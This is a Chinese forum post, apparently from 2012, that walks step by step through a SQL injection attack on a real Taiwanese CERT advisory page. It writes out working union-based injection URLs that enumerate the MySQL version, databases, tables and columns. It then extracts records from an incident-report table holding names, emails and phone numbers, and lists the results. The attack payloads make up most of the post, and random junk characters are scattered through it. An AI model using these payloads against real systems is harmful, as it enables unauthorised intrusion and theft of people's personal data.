1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
% {' v/ R2 H; L- E2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解6 c2 {) Y$ S/ {! x! n& r+ j
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
/ y4 S( G1 `5 X7 k4 q3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
. r+ y4 m2 U: u数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。, f* F+ P( C% o8 \+ z
4.判断有没有写权限
9 m! U, N& I9 Shttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
1 {$ ?! T) B; J# _) d3 ~没办法,手动猜表啦# S v1 [' l, l. S1 A4 i6 U" C. g
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,16 \# Y( m: ?6 t. B
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下6 z" O& K6 [" R) L# x0 `6 L4 F
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--2 [! o# u1 p7 _% H2 ~9 P
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
) J# w, i7 u* N( m# Z7 g2 g+ \information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
9 h" z, W i: P" ~* Y/ p, C6.爆表,爆的是twcert库
; F5 q' o! U: A* {3 J& Ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
8 d& C7 ]6 V/ k; R V爆出如下表
; v' c; t9 }$ E; Bdownloadfile,irsys,newsdata,secrpt,secrpt_big5
! K: v+ G/ q- L4 L6 j2 n7.爆列名,这次爆的是irsys表
7 o0 p" A k. S" ]http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
$ k( I+ O$ R+ S3 b" n6 Q0 l+ Q爆出如下列! P6 ~4 p% }! B. |
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status# I: v1 M( T' s" W& h7 k
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。1 C) A5 k1 x0 x
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
4 n, k, b4 z6 k$ o3 o返回是3,说明每个列里有3个地段
% Z) w( ?9 h8 p- G" D: z5 w# S0 [9.爆字段内容
+ ?+ X: T% d; x% i0 @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--0 w4 O8 i9 ^" Y! \) @4 f
爆出name列的第一个字段的内容
1 o* E5 v' Q# D/ o* r* G% |! m; khttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- b) E3 e! A! i7 R) w
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对